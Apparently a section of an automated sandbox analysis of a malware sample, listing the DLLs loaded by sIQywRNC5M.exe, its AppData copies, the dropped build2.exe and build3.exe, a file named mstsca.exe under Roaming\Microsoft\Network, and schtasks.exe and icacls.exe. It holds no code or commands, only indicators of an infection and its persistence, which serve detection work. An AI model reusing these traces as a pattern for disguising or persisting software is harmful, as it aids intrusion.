Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
